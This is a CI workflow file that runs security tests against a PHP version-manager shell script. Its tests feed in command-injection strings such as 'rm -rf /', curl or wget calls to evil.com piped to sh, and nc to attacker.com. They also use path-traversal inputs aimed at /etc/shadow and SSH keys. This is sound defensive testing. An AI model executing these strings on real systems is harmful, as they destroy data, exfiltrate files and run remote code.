Security and Vulnerability Testing #17

Workflow file for this run

.github/workflows/security-test.yml at adcce1f

	name: Security and Vulnerability Testing

	on:
	push:
	branches: [main, development]
	pull_request:
	branches: [main, development]
	schedule:
	# Run weekly security checks
	- cron: '0 1 * * 1'

	jobs:
	security-scan:
	name: Security Vulnerability Scan
	runs-on: ubuntu-latest
	steps:
	- name: Checkout Repository
	uses: actions/checkout@v4

	- name: Install Security Tools
	run: \|
	# Install shellcheck for security analysis
	sudo apt-get update
	sudo apt-get install -y shellcheck

	- name: Security-focused ShellCheck
	run: \|
	echo "=== Security-focused Shell Analysis ==="

	# Run shellcheck with security focus
	shellcheck -f gcc -S error phpvm.sh \|\| true

	# Check for specific security patterns
	echo "Checking for potential security issues..."

	# Check for unsafe eval usage
	if grep -n "eval" phpvm.sh; then
	echo "Found eval usage - review for security"
	fi

	# Check for unsafe rm operations
	if grep -n "rm -rf \$" phpvm.sh; then
	echo "Found variable-based rm -rf - review for safety"
	fi

	# Check for direct sudo usage without validation
	if grep -n "sudo.*\$" phpvm.sh \| grep -v "run_with_sudo"; then
	echo "Found direct sudo with variables - review for safety"
	fi

	- name: Input Validation Security Test
	run: \|
	chmod +x ./phpvm.sh

	echo "=== Testing Input Validation Security ==="

	# Test command injection attempts
	malicious_inputs=(
	"8.1; rm -rf /"
	"8.1 && curl http://evil.com"
	"8.1 \| nc attacker.com 1234"
	"\$(whoami)"
	"\`id\`"
	"8.1 > /etc/passwd"
	"8.1; cat /etc/shadow"
	"../../../etc/passwd"
	"8.1 \|\| wget http://evil.com/script.sh -O - \| sh"
	)

	for input in "${malicious_inputs[@]}"; do
	echo "Testing malicious input: $input"
	if ./phpvm.sh install "$input" 2>/dev/null; then
	echo "SECURITY ISSUE: Accepted malicious input: $input"
	exit 1
	else
	echo "Correctly rejected: $input"
	fi
	done

	- name: Path Traversal Security Test
	run: \|
	echo "=== Testing Path Traversal Protection ==="

	# Test directory traversal in .phpvmrc
	mkdir -p security_test

	# Path traversal attempts
	path_traversal_inputs=(
	"../../../etc/passwd"
	"../../root/.ssh/id_rsa"
	"/etc/shadow"
	"..\\..\\windows\\system32\\config\\sam"
	"....//....//etc//passwd"
	)

	for input in "${path_traversal_inputs[@]}"; do
	echo "$input" > security_test/.phpvmrc
	cd security_test
	if ../phpvm.sh auto 2>/dev/null; then
	echo "SECURITY ISSUE: Accepted path traversal: $input"
	exit 1
	else
	echo "Correctly rejected path traversal: $input"
	fi
	cd ..
	done

	- name: File Permission Security Test
	run: \|
	echo "=== Testing File Permission Security ==="

	# Test with various .phpvmrc permissions
	mkdir -p perm_test
	echo "8.1" > perm_test/.phpvmrc

	# Test with world-writable .phpvmrc
	chmod 777 perm_test/.phpvmrc
	cd perm_test
	../phpvm.sh auto \|\| echo "Handled world-writable .phpvmrc"
	cd ..

	# Test with unreadable .phpvmrc
	chmod 000 perm_test/.phpvmrc
	cd perm_test
	if ../phpvm.sh auto 2>/dev/null; then
	echo "Should have failed with unreadable .phpvmrc"
	exit 1
	else
	echo "Correctly handled unreadable .phpvmrc"
	fi
	cd ..

	- name: Environment Variable Security Test
	run: \|
	echo "=== Testing Environment Variable Security ==="

	# Test with malicious environment variables
	export PHPVM_DIR="/tmp/malicious; rm -rf /"
	if ./phpvm.sh version 2>/dev/null; then
	echo "Script executed with malicious PHPVM_DIR"
	else
	echo "Handled malicious PHPVM_DIR safely"
	fi

	# Reset environment
	unset PHPVM_DIR

	- name: Symlink Security Test
	run: \|
	echo "=== Testing Symlink Security ==="

	# Test symlink attacks
	mkdir -p symlink_test
	echo "8.1" > symlink_test/legitimate.phpvmrc

	# Create symlink to sensitive file
	ln -s /etc/passwd symlink_test/.phpvmrc

	cd symlink_test
	if ../phpvm.sh auto 2>/dev/null; then
	echo "Script followed symlink to /etc/passwd"
	else
	echo "Safely handled symlink attack"
	fi
	cd ..

	privilege-escalation-test:
	name: Privilege Escalation Tests
	runs-on: ubuntu-latest
	steps:
	- name: Checkout Repository
	uses: actions/checkout@v4

	- name: Test Privilege Escalation Prevention
	run: \|
	chmod +x ./phpvm.sh

	echo "=== Testing Privilege Escalation Prevention ==="

	# Test running as non-root user
	# Ensure script doesn't inappropriately escalate privileges

	# Create a test user (this simulates running as non-root)
	# Note: In GitHub Actions, we're already non-root

	# Test sudo usage validation
	if grep -n "sudo" phpvm.sh \| grep -v "run_with_sudo"; then
	echo "Found sudo usage outside of run_with_sudo helper"
	fi

	# Ensure run_with_sudo function exists and is used properly
	if ! grep -q "run_with_sudo()" phpvm.sh; then
	echo "run_with_sudo function not found"
	exit 1
	fi

	echo "Privilege escalation tests passed"

	- name: Test Sudo Command Validation
	run: \|
	echo "=== Testing Sudo Command Validation ==="

	# Check that run_with_sudo properly validates commands
	# Look for any direct variable expansion in sudo calls

	if grep -n "sudo.*\$[^{]" phpvm.sh \| grep -v "run_with_sudo"; then
	echo "Found potentially unsafe sudo variable expansion"
	fi

	echo "Sudo validation tests completed"

	code-quality-security:
	name: Code Quality and Security Standards
	runs-on: ubuntu-latest
	steps:
	- name: Checkout Repository
	uses: actions/checkout@v4

	- name: Check for Hardcoded Secrets
	run: \|
	echo "=== Checking for Hardcoded Secrets ==="

	# Check for potential secrets or credentials
	secret_patterns=(
	"password"
	"secret"
	"key.*="
	"token"
	"api.*key"
	"auth.*token"
	)

	for pattern in "${secret_patterns[@]}"; do
	if grep -i "$pattern" phpvm.sh; then
	echo "Found potential secret pattern: $pattern"
	fi
	done

	echo "Secret scanning completed"

	- name: Check Error Handling Security
	run: \|
	echo "=== Checking Error Handling Security ==="

	# Ensure errors don't leak sensitive information
	if grep -n "echo.*\$" phpvm.sh \| grep -i "error"; then
	echo "Found error messages that might leak information"
	fi

	# Check for proper error code usage
	if ! grep -q "return 1" phpvm.sh; then
	echo "No proper error returns found"
	exit 1
	fi

	echo "Error handling security check completed"

	- name: Validate Safe Defaults
	run: \|
	echo "=== Validating Safe Defaults ==="

	# Check that DEBUG defaults to false
	if ! grep -q "DEBUG=false" phpvm.sh; then
	echo "DEBUG should default to false"
	exit 1
	fi

	# Check for safe directory defaults
	if ! grep -q "PHPVM_DIR.*HOME" phpvm.sh; then
	echo "PHPVM_DIR should default to user's home directory"
	exit 1
	fi

	echo "Safe defaults validation completed"

	penetration-test:
	name: Security Testing
	runs-on: ubuntu-latest
	steps:
	- name: Checkout Repository
	uses: actions/checkout@v4

	- name: Buffer Overflow and Input Validation Test
	run: \|
	chmod +x ./phpvm.sh

	echo "=== Testing Security Vulnerabilities ==="

	# Test with extremely long inputs
	very_long_input=$(printf 'A%.0s' {1..1000})
	if ./phpvm.sh install "$very_long_input" 2>/dev/null; then
	echo "SECURITY ISSUE: Accepted extremely long input"
	exit 1
	else
	echo "Correctly rejected extremely long input"
	fi

	# Test concurrent operations and state validation
	mkdir -p ~/.phpvm
	echo "corrupted_state" > ~/.phpvm/active_version
	./phpvm.sh list \|\| echo "Handled corrupted state gracefully"

	echo "Security tests completed"

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Uh oh!

Security and Vulnerability Testing #17

Workflow file

Security and Vulnerability Testing #17

Uh oh!

Jobs

Run details

Workflow file for this run